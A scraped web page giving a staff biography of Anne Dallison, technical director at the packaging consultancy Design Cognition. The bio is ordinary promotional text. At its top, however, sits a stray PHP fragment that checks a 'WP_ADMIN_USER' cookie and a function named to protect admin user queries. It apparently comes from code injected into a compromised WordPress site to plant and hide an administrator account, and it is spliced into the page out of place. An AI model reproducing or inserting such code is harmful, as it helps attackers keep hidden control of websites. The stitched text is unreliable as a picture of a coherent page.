if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Design Cognition » Anne Dallison - your packaging design, development, project management & training partner & consultant

Anne Dallison

Anne as Technical Director, has a 25 year track record of hundreds of successful and innovative branded international product launches for Boots The Chemists, Boots Healthcare International and more recently for Reckitt Benckiser Healthcare International. These include global brands such as Nurofen, Strepsils, Optrex, Lemsip and Gaviscon.

Sectors: Healthcare, Pharmaceuticals (OTC & Rx), dental, mouthwash, Vitamins and minerals, food, confectionary, beverages, and many others.

Materials: development & selection, evaluation, testing and inevitably on root cause/failure analysis (not too often thankfully).

All the elements of product development from concept through to commercialisation. Incorporating: Feasibility, COGS, Procurement, Consumer testing, Production requirements, Graphics development, legal and trade needs.

Markets: National, multinational and international product developments/launches with products/components sourced throughout the world.

Anne is a renowned industry expert. She is an active member of the Institute of Packaging Pharmaceutical Forum. She is also proactively involved in the establishment of the ‘BSI & CEN Standard for Braille on Packaging’.

Anne is a fantastic addition to the Design Cognition team and is playing a key role in the company’s initiatives to drill deeper into the healthcare sector, taking our business to the next level.

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